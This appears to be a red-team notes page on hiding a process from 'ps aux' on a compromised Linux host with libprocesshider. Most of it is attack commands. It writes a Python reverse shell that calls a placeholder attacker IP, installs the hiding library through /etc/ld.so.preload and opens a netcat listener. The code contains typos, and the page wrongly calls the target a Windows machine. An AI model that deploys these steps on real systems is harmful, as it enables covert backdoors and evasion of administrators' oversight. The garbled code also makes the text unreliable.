RedTeam
5.Machine
1.Linux
General
Exploitation
AV-Detection-Evasion
Evasion-Techniques
Tools
Libprocesshider

General

GOAL ---> Hide process from ps aux

Libprocesshider is a library that allows software developers to hide the details of a process from the operating system. It provides an API for hiding the process name and arguments, as well as for hiding the presence of the process from process management utilities. The library is useful for hiding the details of malware or other types of malicious software, as well as for protecting proprietary software from reverse engineering.

Important

  • Can only hide one process at the time

Commands

The reposity need to be cloned on the target (windows machine)

Download the reposity (Target)

git clone https://github.com/gianlucaborello/libprocesshider.git

Create reverse shell and compile the code (Target)

# Create a rever shell (reverse_shell.py)
nano reverse_shell.py
	#!/usr/bin/python3 
	from os import dup2  
	from subprocess import run
	import socket  
	s-socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(("IP",PORT))  
	dup2(s.fileno(),0)  
	dup2(s.fileno(),1)
	dup2(s.fileno(),2)  
	run([*/bin/bash","-i*])

# Give chmod permission
chmod +x reverse_shell.py

# Edit processhider.c
nano processhider.c
- Change the script name of the python code for your evil code
- Save

# Compile the code in the direcotry
USER@sid:~/libprocesshider$ make
'---> This will create libprocesshider.so

# Copy the file in the right folder
cp libprocesshider.so /usr/local/lib/

# Load it with the global dynamic linker
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload

Launch the reverse_shell

./reverse_shell.py

Netcat Lisener (Attacking)

nc -lvnp PORT

The process should now be hiden

More Information

More information ---> https://github.com/gianlucaborello/libprocesshider (opens in a new tab)